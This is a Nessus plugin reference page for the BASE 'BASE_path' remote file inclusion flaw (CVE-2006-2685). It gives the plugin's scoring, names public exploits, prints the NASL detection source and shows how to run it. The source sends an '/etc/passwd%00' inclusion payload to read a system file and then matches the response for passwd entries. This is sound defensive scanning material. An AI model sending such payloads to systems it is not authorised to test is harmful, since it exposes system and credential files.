BASE Multiple Script BASE_path Parameter Remote File Inclusion - Nessus
Medium Plugin ID: 21611This page contains detailed information about the BASE Multiple Script BASE_path Parameter Remote File Inclusion Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.
Plugin Overview
ID: 21611
Name: BASE Multiple Script BASE_path Parameter Remote File Inclusion
Filename: base_BASE_path_file_include.nasl
Vulnerability Published: 2006-05-25
This Plugin Published: 2006-05-27
Last Modification Time: 2022-04-11
Plugin Version: 1.22
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies:
http_version.nasl
Required KB Items [?]: www/PHP
Excluded KB Items: Settings/disable_cgi_scanning
Vulnerability Information
Severity: Medium
Vulnerability Published: 2006-05-25
Patch Published: N/A
CVE [?]: CVE-2006-2685
CPE [?]: cpe:/a:secureideas:basic_analysis_and_security_engine
Synopsis
The remote web server contains a PHP application that is prone to remote file inclusion attacks.
Description
The remote host is running BASE, a web-based tool for analyzing alerts from one or more SNORT sensors.
The version of BASE installed on the remote host fails to sanitize input to the 'BASE_path' parameter before using it in PHP include_once() function in several scripts. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit this flaw to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.
Solution
Upgrade to BASE 1.2.5 or later.
Public Exploits
Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available
Here's the list of publicly known exploits and PoCs for verifying the BASE Multiple Script BASE_path Parameter Remote File Inclusion vulnerability:
- Metasploit: exploit/unix/webapp/base_qry_common
[BASE base_qry_common Remote File Include] - Exploit-DB: exploits/php/webapps/1823.txt
[EDB-1823: BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion] - Exploit-DB: exploits/php/webapps/9908.rb
[EDB-9908: BASE 1.2.4 - 'base_qry_common.php' Remote File Inclusion (Metasploit)] - Exploit-DB: exploits/php/webapps/16897.rb
[EDB-16897: BASE - 'base_qry_common' Remote File Inclusion (Metasploit)]
Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.
WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.
Risk Information
CVSS V2 Vector [?]: AV:N/AC:H/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C
| CVSS Base Score: | 4.0 (Medium) |
| Impact Subscore: | 4.9 |
| Exploitability Subscore: | 4.9 |
| CVSS Temporal Score: | 3.3 (Low) |
| CVSS Environmental Score: | NA (None) |
| Modified Impact Subscore: | NA |
| Overall CVSS Score: | 3.3 (Low) |
Go back to menu.
Plugin Source
This is the base_BASE_path_file_include.nasl nessus plugin source code. This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(21611);
script_version("1.22");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2006-2685");
script_bugtraq_id(18298);
script_xref(name:"EDB-ID", value:"1823");
script_name(english:"BASE Multiple Script BASE_path Parameter Remote File Inclusion");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to
remote file inclusion attacks.");
script_set_attribute(attribute:"description", value:
"The remote host is running BASE, a web-based tool for analyzing alerts
from one or more SNORT sensors.
The version of BASE installed on the remote host fails to sanitize
input to the 'BASE_path' parameter before using it in PHP
include_once() function in several scripts. Provided PHP's
'register_globals' setting is enabled, an unauthenticated attacker may
be able to exploit this flaw to view arbitrary files on the remote
host or to execute arbitrary PHP code, possibly taken from third-party
hosts.");
# http://sourceforge.net/project/shownotes.php?group_id=103348&release_id=422282
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dd74f480");
script_set_attribute(attribute:"solution", value:
"Upgrade to BASE 1.2.5 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'BASE base_qry_common Remote File Include');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/25");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/27");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:secureideas:basic_analysis_and_security_engine");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl");
script_require_keys("www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
# Loop through various directories.
if (thorough_tests) dirs = list_uniq(make_list("/base", cgi_dirs()));
else dirs = make_list(cgi_dirs());
foreach dir (dirs)
{
# Try to exploit the flaw to read a file.
file = "/etc/passwd%00";
r = http_send_recv3(method:"GET", port: port,
item:string(
dir, "/base_qry_common.php?",
"BASE_path=", file ) );
if (isnull(r)) exit(0);
res = r[2];
# There's a problem if...
if (
# there's an entry for root or...
egrep(pattern:"root:.*:0:[01]:", string:res) ||
# we get an error saying "failed to open stream".
egrep(pattern:"main\(/etc/passwd\\0/includes/base_signature.+ failed to open stream", string:res) ||
# we get an error claiming the file doesn't exist or...
egrep(pattern:"main\(/etc/passwd\).*: failed to open stream: No such file or directory", string:res) ||
# we get an error about open_basedir restriction.
egrep(pattern:"main.+ open_basedir restriction in effect. File\(/etc/passwd", string:res)
)
{
if (egrep(string:res, pattern:"root:.*:0:[01]:"))
{
res = data_protection::redact_etc_passwd(output:res);
report = string(
"\n",
"Here are the contents of the file '/etc/passwd' that Nessus\n",
"was able to read from the remote host :\n",
"\n",
res
);
security_warning(port:port, extra:report);
}
else security_warning(port);
exit(0);
}
}
The latest version of this script can be found in these locations depending on your platform:
- Linux / Unix:
/opt/nessus/lib/nessus/plugins/base_BASE_path_file_include.nasl - Windows:
C:\ProgramData\Tenable\Nessus\nessus\plugins\base_BASE_path_file_include.nasl - Mac OS X:
/Library/Nessus/run/lib/nessus/plugins/base_BASE_path_file_include.nasl
Go back to menu.
How to Run
Here is how to run the BASE Multiple Script BASE_path Parameter Remote File Inclusion as a standalone plugin via the Nessus web user interface (https://localhost:8834/):
- Click to start a New Scan.
- Select Advanced Scan.
- Navigate to the Plugins tab.
- On the top right corner click to Disable All plugins.
- On the left side table select CGI abuses plugin family.
- On the right side table select BASE Multiple Script BASE_path Parameter Remote File Inclusion plugin ID 21611.
- Specify the target on the Settings tab and click to Save the scan.
- Run the scan.
Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.
Basic usage:
/opt/nessus/bin/nasl base_BASE_path_file_include.nasl -t <IP/HOST>Run the plugin with audit trail message on the console:
/opt/nessus/bin/nasl -a base_BASE_path_file_include.nasl -t <IP/HOST>Run the plugin with trace script execution written to the console (useful for debugging):
/opt/nessus/bin/nasl -T - base_BASE_path_file_include.nasl -t <IP/HOST>Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):
/opt/nessus/bin/nasl -K /tmp/state base_BASE_path_file_include.nasl -t <IP/HOST>Go back to menu.
References
BID | SecurityFocus Bugtraq ID: See also:
- https://www.tenable.com/plugins/nessus/21611
- http://www.nessus.org/u?dd74f480
- https://vulners.com/nessus/BASE_BASE_PATH_FILE_INCLUDE.NASL
- 39536 - BASE < 1.2.5 readRoleCookie() Auth Bypass
- 145266 - Oracle Database Server Multiple Vulnerabilities (Jan 2021 CPU)
- 146016 - CentOS 8 : qt5-qtbase and qt5-qtwebsockets (CESA-2020:4690)
- 14641 - Oracle Database Multiple Remote Vulnerabilities (Mar 2005)
- 148894 - Oracle Database Server Multiple Vulnerabilities (Apr 2021 CPU)
- 148977 - Oracle NoSQL Database Multiple Vulnerabilities (Apr 2021 CPU)
- 152026 - Oracle Database Server Multiple Vulnerabilities (Jul 2021 CPU)
- 154253 - Oracle NoSQL Database Multiple Vulnerabilities (Oct 2021 CPU)
- 154332 - Oracle Database Server Multiple Vulnerabilities (October 2021 CPU)
- 157637 - AlmaLinux 8 : qt5-qtbase and qt5-qtwebsockets (ALSA-2020:4690)
- 158067 - Debian DLA-2923-1 : h2database - LTS security update
- 158090 - Debian DSA-5076-1 : h2database - security update
- 158252 - H2 Database JNDI Lookup RCE (CVE-2021-42392)
- 160079 - Oracle Database Server (Apr 2022 CPU)
- 16209 - Oracle Database Multiple Vulnerabilities (January 2005 CPU)
- 18034 - Oracle Database 10g Multiple Remote Vulnerabilities
- 19106 - FreeBSD : linux_base -- vulnerabilities in Red Hat 7.1 libraries (bf2e7483-d3fa-440d-8c6e-8f1f2f018818)
- 19218 - Sybase EAServer WebConsole jaqadmin Default Password
- 22309 - SAP DB / MaxDB WebDBM Client Database Name Remote Overflow
- 22923 - FreeBSD : mysql -- database 'case-sensitive' privilege escalation (a0e92718-6603-11db-ab90-000e35fd8194)
- 23641 - MODx CMS base_path Parameter Remote File Inclusion
- 23863 - GLSA-200612-11 : AMD64 x86 emulation base libraries: OpenSSL multiple vulnerabilities
- 29218 - Sun OpenOffice.org < 2.3.1 Database HSQLDB Database Document Handling Arbitrary Java Code Execution
- 38664 - Intel Common Base Agent CreateProcessA() Function Remote Command Execution
- 39536 - BASE < 1.2.5 readRoleCookie() Auth Bypass
- 45073 - openSUSE Security Update : OpenOffice_org-base-drivers-postgresql (OpenOffice_org-base-drivers-postgresql-1981)
- 45075 - openSUSE Security Update : OpenOffice_org-base-drivers-postgresql (OpenOffice_org-base-drivers-postgresql-1980)
- 45625 - Oracle Database Multiple Vulnerabilities (January 2010 CPU)
- 45626 - Oracle Database Multiple Vulnerabilities (April 2010 CPU)
- 51573 - Oracle Database Multiple Vulnerabilities (January 2011 CPU)
- 53897 - Oracle Database Multiple Vulnerabilities (April 2011 CPU)
- 56051 - Oracle Database Multiple Vulnerabilities (January 2006 CPU)
- 56054 - Oracle Database Multiple Vulnerabilities (October 2006 CPU)
- 56055 - Oracle Database Multiple Vulnerabilities (January 2007 CPU)
- 56056 - Oracle Database Multiple Vulnerabilities (April 2007 CPU)
Version
This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file base_BASE_path_file_include.nasl version 1.22. For more plugins, visit the Nessus Plugin Library.
Go back to menu.
